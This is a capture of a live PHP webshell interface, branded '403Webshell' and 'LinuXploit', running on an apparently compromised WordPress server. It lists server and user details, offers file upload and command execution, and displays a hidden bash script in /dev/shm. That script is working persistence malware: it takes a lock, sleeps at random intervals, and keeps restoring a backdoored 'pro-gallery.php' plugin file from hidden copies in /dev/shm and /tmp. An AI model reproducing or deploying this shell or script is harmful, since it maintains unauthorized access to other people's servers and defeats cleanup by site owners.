403Webshell
Server IP : 107.13.46.68  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux mariOS 6.8.0-51-generic #52-Ubuntu SMP PREEMPT_DYNAMIC Thu Dec 5 13:09:44 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /dev/shm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /dev/shm/.9e24267f
#!/bin/bash
L='/dev/shm/.9e24267f.lock'
exec 200>"$L" && flock -n 200 || exit 0
B1='/dev/shm/.pro-gallery.php'
B2='/tmp/.pro-gallery.php'
SELF='/var/www/mariotermine.me/wp-content/plugins/pro-gallery/pro-gallery.php'
while :; do
  sleep $((1500 + RANDOM % 600))
  if [ ! -f "$SELF" ]; then
    for b in "$B1" "$B2"; do [ -f "$b" ] && { cp "$b" "$SELF" 2>/dev/null; break; }; done
  fi
  [ -f "$B1" ] || cp "$SELF" "$B1" 2>/dev/null
  [ -f "$B2" ] || cp "$SELF" "$B2" 2>/dev/null
done

Youez - 2016 - github.com/yon3zu
LinuXploit